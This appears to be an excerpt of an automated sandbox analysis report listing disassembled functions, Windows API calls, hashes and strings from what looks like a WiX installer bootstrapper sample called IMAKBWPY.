                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$lstrlen
                                                                                                                • String ID: BundleUpgradeCode$regutil.cpp
                                                                                                                • API String ID: 3790715954-1648651458
                                                                                                                • Opcode ID: 91bae9cf266e2405f4943ed033f0d18fd225c44d228ad18c9561aac93da64305
                                                                                                                • Instruction ID: 21aba14d5f3dbaf64e4461c73f8ccd05c6900558adf43fc18ff307f9a949e6a2
                                                                                                                • Opcode Fuzzy Hash: 91bae9cf266e2405f4943ed033f0d18fd225c44d228ad18c9561aac93da64305
                                                                                                                • Instruction Fuzzy Hash: CF41B435A0019AFFDB22DF96C844EAEB7AEEF44710F15416AFD11EB650D6309D00DBA0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E490D: SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,009B8770,00000000,00000000,00000000,00000000,00000000), ref: 009E4925
                                                                                                                  • Part of subcall function 009E490D: GetLastError.KERNEL32(?,?,?,009B8770,00000000,00000000,00000000,00000000,00000000), ref: 009E492F
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,009E5C09,?,?,?,?,?,?,?,00010000,?), ref: 009E63C0
                                                                                                                • WriteFile.KERNEL32(000000FF,00000008,00000008,?,00000000,000000FF,00000000,00000000,00000000,00000000,?,009E5C09,?,?,?,?), ref: 009E6412
                                                                                                                • GetLastError.KERNEL32(?,009E5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 009E6458
                                                                                                                • GetLastError.KERNEL32(?,009E5C09,?,?,?,?,?,?,?,00010000,?,00000001,?,GET,?,?), ref: 009E647E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLast$Write$Pointer
                                                                                                                • String ID: dlutil.cpp
                                                                                                                • API String ID: 133221148-2067379296
                                                                                                                • Opcode ID: 4e166a85804c790f8727697d7f75799c3b1ede80a7c74df349b5a13b20530dab
                                                                                                                • Instruction ID: 92d37d43d91808cce2b6a1c06cd0a83fd95839ff999c287348f02f3f121538d7
                                                                                                                • Opcode Fuzzy Hash: 4e166a85804c790f8727697d7f75799c3b1ede80a7c74df349b5a13b20530dab
                                                                                                                • Instruction Fuzzy Hash: 7641A17290025ABFDB228E96CD85FEE7B69FF147A0F154125FD00A61A0E331DD20DBA0
                                                                                                                APIs
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,009DFFEF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009DFFEF,009C12CF,?,00000000), ref: 009A246E
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009DFFEF,009C12CF,?,00000000,0000FDE9,?,009C12CF), ref: 009A247A
                                                                                                                  • Part of subcall function 009A3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009A21CC,000001C7,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3BDB
                                                                                                                  • Part of subcall function 009A3BD3: HeapSize.KERNEL32(00000000,?,009A21CC,000001C7,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3BE2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                • String ID: strutil.cpp
                                                                                                                • API String ID: 3662877508-3612885251
                                                                                                                • Opcode ID: e74fcd49e1f8269026066c801bc0855cd5365eab6f7ac1b5a7fc51fc3454ac3c
                                                                                                                • Instruction ID: 8935f9883bbd3df929d0194999a11eaf2858dab4a17f65aa10a0b5aab569661b
                                                                                                                • Opcode Fuzzy Hash: e74fcd49e1f8269026066c801bc0855cd5365eab6f7ac1b5a7fc51fc3454ac3c
                                                                                                                • Instruction Fuzzy Hash: 8D31C33130421AEFE7109F6D8CD4A6637DEBB5A368B108629FE119B2B0E775DC0197E0
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,?,000000FF,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 009CADB3
                                                                                                                Strings
                                                                                                                • Failed to skip the extraction of payload: %ls from container: %ls, xrefs: 009CAE4A
                                                                                                                • Failed to extract all payloads from container: %ls, xrefs: 009CADF7
                                                                                                                • Failed to extract payload: %ls from container: %ls, xrefs: 009CAE3E
                                                                                                                • Failed to open container: %ls., xrefs: 009CAD85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareString
                                                                                                                • String ID: Failed to extract all payloads from container: %ls$Failed to extract payload: %ls from container: %ls$Failed to open container: %ls.$Failed to skip the extraction of payload: %ls from container: %ls
                                                                                                                • API String ID: 1825529933-3891707333
                                                                                                                • Opcode ID: e5f3fe35adb42557b9b264b9404b8ce546511d660dfbd067f61d2a98545ba9ce
                                                                                                                • Instruction ID: 60a2262c9d8262dbd4ed98d809ae1370031eeacec6a06e035aca4b3c2d4693e3
                                                                                                                • Opcode Fuzzy Hash: e5f3fe35adb42557b9b264b9404b8ce546511d660dfbd067f61d2a98545ba9ce
                                                                                                                • Instruction Fuzzy Hash: 9D31E532C0011DABCF22AAE4CC45F9E7768AF44728F104615FE21A71A1E7359E54DBE2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E7AF4
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 009E7AFF
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E7B0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeString$Heap$AllocateProcess
                                                                                                                • String ID: `<u$atomutil.cpp
                                                                                                                • API String ID: 2724874077-4051019476
                                                                                                                • Opcode ID: 0e8847a75af3272e1526da4b98e7d3672549bb35413d0776c9fac7c38c1c781e
                                                                                                                • Instruction ID: fc78b2320adb4d13426feba192b314f8a58833595d7d2567adb62004a7fa90ba
                                                                                                                • Opcode Fuzzy Hash: 0e8847a75af3272e1526da4b98e7d3672549bb35413d0776c9fac7c38c1c781e
                                                                                                                • Instruction Fuzzy Hash: 18318232D0916ABBCB139BDACC45F9EFBA8EF40754F1541A1FA00AB150D7709E009BD1
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000000,00000001,000000FF,?,000000FF,00000001,PackageVersion,00000001,?,009B0654,00000001,00000001,00000001,009B0654,00000000), ref: 009AF07D
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,PackageVersion,00000001,?,009B0654,00000001,00000001,00000001,009B0654,00000000,00000001,00000000,?,009B0654,00000001), ref: 009AF09A
                                                                                                                Strings
                                                                                                                • PackageVersion, xrefs: 009AF05E
                                                                                                                • Failed to format key for update registration., xrefs: 009AF033
                                                                                                                • Failed to remove update registration key: %ls, xrefs: 009AF0C7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCompareString
                                                                                                                • String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
                                                                                                                • API String ID: 446873843-3222553582
                                                                                                                • Opcode ID: 91bfa3f08a1f6d56ce7326dc10340dc6e089375a7eab9cdbaa5b73fdd8a0f497
                                                                                                                • Instruction ID: 46e81fbc5b7726e2b2432b1e9bb90d20d4f7e2b74bbdd9c5421477ce1682a65d
                                                                                                                • Opcode Fuzzy Hash: 91bfa3f08a1f6d56ce7326dc10340dc6e089375a7eab9cdbaa5b73fdd8a0f497
                                                                                                                • Instruction Fuzzy Hash: 37218131D00269BBCB21ABA5CC49FAFBEB8DF82724F100265F914E7152E7759E40D6D0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E4440: FindFirstFileW.KERNEL32(009C923A,?,00000100,00000000,00000000), ref: 009E447B
                                                                                                                  • Part of subcall function 009E4440: FindClose.KERNEL32(00000000), ref: 009E4487
                                                                                                                • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,wininet.dll,?,crypt32.dll,?,?,?,00000000), ref: 009E4430
                                                                                                                  • Part of subcall function 009E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A0AAA0,00000000,?,009E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009E0F80
                                                                                                                  • Part of subcall function 009E1217: RegQueryValueExW.ADVAPI32(00000000,000002C0,00000000,000002C0,00000000,00000000,000002C0,BundleUpgradeCode,00000410,000002C0,00000000,00000000,00000000,00000100,00000000), ref: 009E123F
                                                                                                                  • Part of subcall function 009E1217: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,009B70E8,00000100,000000B0,00000088,00000410,000002C0), ref: 009E1276
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseFindQueryValue$FileFirstOpen
                                                                                                                • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$\$crypt32.dll
                                                                                                                • API String ID: 3397690329-3978359083
                                                                                                                • Opcode ID: 3f3ac2a605570d606a73ad4523eae04c0ef32e30889c0403363a4e2c1b762c8b
                                                                                                                • Instruction ID: 236cfd6ee9be699b400a6ce1e5cf1da26e179f669e504752a595a358bafbccc3
                                                                                                                • Opcode Fuzzy Hash: 3f3ac2a605570d606a73ad4523eae04c0ef32e30889c0403363a4e2c1b762c8b
                                                                                                                • Instruction Fuzzy Hash: 9731A431A00249FBDF229F96DC41BBEB7B9FF40750F54817AE904A62A1E3319E50CB90
                                                                                                                APIs
                                                                                                                • CopyFileW.KERNEL32(00000000,009A4DBC,00000000,?,?,00000000,?,009E412D,00000000,009A4DBC,00000000,00000000,?,009B85EE,?,?), ref: 009E4033
                                                                                                                • GetLastError.KERNEL32(?,009E412D,00000000,009A4DBC,00000000,00000000,?,009B85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 009E4041
                                                                                                                • CopyFileW.KERNEL32(00000000,009A4DBC,00000000,009A4DBC,00000000,?,009E412D,00000000,009A4DBC,00000000,00000000,?,009B85EE,?,?,00000001), ref: 009E40AC
                                                                                                                • GetLastError.KERNEL32(?,009E412D,00000000,009A4DBC,00000000,00000000,?,009B85EE,?,?,00000001,00000003,000007D0,?,?,?), ref: 009E40B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CopyErrorFileLast
                                                                                                                • String ID: fileutil.cpp
                                                                                                                • API String ID: 374144340-2967768451
                                                                                                                • Opcode ID: a64d4616346a67390ba612ff781ca3bec9a5c77368eb5f2c14f853871acbddf9
                                                                                                                • Instruction ID: c173411fe0a1bac4d5da967213c7ddfba3d639dd01bce9b8a0f7b5f96bccae6c
                                                                                                                • Opcode Fuzzy Hash: a64d4616346a67390ba612ff781ca3bec9a5c77368eb5f2c14f853871acbddf9
                                                                                                                • Instruction Fuzzy Hash: E121FF266003F697EB320AAB4C80B3B669CFF10BA2B150536FF04DF161E7A48C4092E1
                                                                                                                APIs
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009AEF56
                                                                                                                  • Part of subcall function 009E4153: SetFileAttributesW.KERNEL32(009C923A,00000080,00000000,009C923A,000000FF,00000000,?,?,009C923A), ref: 009E4182
                                                                                                                  • Part of subcall function 009E4153: GetLastError.KERNEL32(?,?,009C923A), ref: 009E418C
                                                                                                                  • Part of subcall function 009A3C6B: RemoveDirectoryW.KERNEL32(00000001,00000000,00000000,00000000,?,?,009AEFA1,00000001,00000000,00000095,00000001,009B0663,00000095,00000000,swidtag,00000001), ref: 009A3C88
                                                                                                                Strings
                                                                                                                • Failed to format tag folder path., xrefs: 009AEFC3
                                                                                                                • Failed to allocate regid folder path., xrefs: 009AEFBC
                                                                                                                • Failed to allocate regid file path., xrefs: 009AEFB5
                                                                                                                • swidtag, xrefs: 009AEF65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesDirectoryErrorFileLastOpen@16Remove
                                                                                                                • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to format tag folder path.$swidtag
                                                                                                                • API String ID: 1428973842-4170906717
                                                                                                                • Opcode ID: b4b275cbc99b322227379fce5c2c529c28f5f57c6dc18b66f4ff69df17d222bf
                                                                                                                • Instruction ID: 7e010ae802abfcd82f6eb59ea3524d4de200547332b36a4cda414ee2191c8025
                                                                                                                • Opcode Fuzzy Hash: b4b275cbc99b322227379fce5c2c529c28f5f57c6dc18b66f4ff69df17d222bf
                                                                                                                • Instruction Fuzzy Hash: 43217831D00518FFCB16EB99CC41BADFBB9EF85710F1480A6F914B62A2D7719E40AB90
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A0AAA0,00000000,?,009E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009E0F80
                                                                                                                • CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 009C8E3A
                                                                                                                • RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,009AF7E0,00000001,00000100,000001B4,00000000), ref: 009C8E88
                                                                                                                Strings
                                                                                                                • Failed to enumerate uninstall key for related bundles., xrefs: 009C8E99
                                                                                                                • Failed to open uninstall registry key., xrefs: 009C8DFD
                                                                                                                • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 009C8DD7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCompareOpenString
                                                                                                                • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                • API String ID: 2817536665-2531018330
                                                                                                                • Opcode ID: 006f89c29470b84cfbefb2348607c3dac7e659a20c19ffeb162dcaf724dee95e
                                                                                                                • Instruction ID: 64ebf2aa156b86175c35deadedb2234e3c40d54bdacce9d0ee60c3c96aebd53c
                                                                                                                • Opcode Fuzzy Hash: 006f89c29470b84cfbefb2348607c3dac7e659a20c19ffeb162dcaf724dee95e
                                                                                                                • Instruction Fuzzy Hash: 6A21A332D1022CFFDB12BA94CC4AFAFBA69EB40721F244668F51077061DB754E90E691
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009CD2EE
                                                                                                                • ReleaseMutex.KERNEL32(?), ref: 009CD31C
                                                                                                                • SetEvent.KERNEL32(?), ref: 009CD325
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
                                                                                                                • String ID: Failed to allocate buffer.$NetFxChainer.cpp
                                                                                                                • API String ID: 944053411-3611226795
                                                                                                                • Opcode ID: eb02677367e1442208b6f05d6d754522147971bd58c86fe8251d2881981d4e9b
                                                                                                                • Instruction ID: d43d2c6a90f7101b6751148e4715aa387c7d033ddc5735556087fca5d7fc5e57
                                                                                                                • Opcode Fuzzy Hash: eb02677367e1442208b6f05d6d754522147971bd58c86fe8251d2881981d4e9b
                                                                                                                • Instruction Fuzzy Hash: FF21B170A0024ABFDB109F68D884F59B7F5FF48320F108629F964AB351C371AD508B91
                                                                                                                APIs
                                                                                                                • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,009C6B11,00000000,?), ref: 009E591D
                                                                                                                • GetLastError.KERNEL32(?,?,009C6B11,00000000,?,?,?,?,?,?,?,?,?,009C6F28,?,?), ref: 009E592B
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,009C6B11,00000000,?), ref: 009E5965
                                                                                                                • GetLastError.KERNEL32(?,?,009C6B11,00000000,?,?,?,?,?,?,?,?,?,009C6F28,?,?), ref: 009E596F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConfigErrorHeapLastQueryService$AllocateProcess
                                                                                                                • String ID: svcutil.cpp
                                                                                                                • API String ID: 355237494-1746323212
                                                                                                                • Opcode ID: b2d3e0afe3a2f9976271f6a87c22c6d12b0c233f3dcbedd0c424d5549d602388
                                                                                                                • Instruction ID: a0275f9e149b83bd899e5445ea587b2fefda5d7c80bdc51b59afd30f0463c8cc
                                                                                                                • Opcode Fuzzy Hash: b2d3e0afe3a2f9976271f6a87c22c6d12b0c233f3dcbedd0c424d5549d602388
                                                                                                                • Instruction Fuzzy Hash: 5821F636951679F7D73256978C04BDF7A6DAB41B74F534011FD04AB242E724CE0092E0
                                                                                                                APIs
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 009E3258
                                                                                                                • VariantInit.OLEAUT32(?), ref: 009E3264
                                                                                                                • VariantClear.OLEAUT32(?), ref: 009E32D8
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009E32E3
                                                                                                                  • Part of subcall function 009E3498: SysAllocString.OLEAUT32(?), ref: 009E34AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$AllocVariant$ClearFreeInit
                                                                                                                • String ID: `<u
                                                                                                                • API String ID: 347726874-3367579956
                                                                                                                • Opcode ID: a53bfac955bc8b7d28c96424d38287e518aec22ef868dee200e7fdfd55060728
                                                                                                                • Instruction ID: 70692fed39c6ffabf45df66c96963a0c3fc939ec1299f4081cb07db80b4a25e9
                                                                                                                • Opcode Fuzzy Hash: a53bfac955bc8b7d28c96424d38287e518aec22ef868dee200e7fdfd55060728
                                                                                                                • Instruction Fuzzy Hash: B6214C31A0125AAFCB16DFA5C89CEAFBBB9EF48715F108158E9119B320D7319E05CB90
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memcpy_s
                                                                                                                • String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
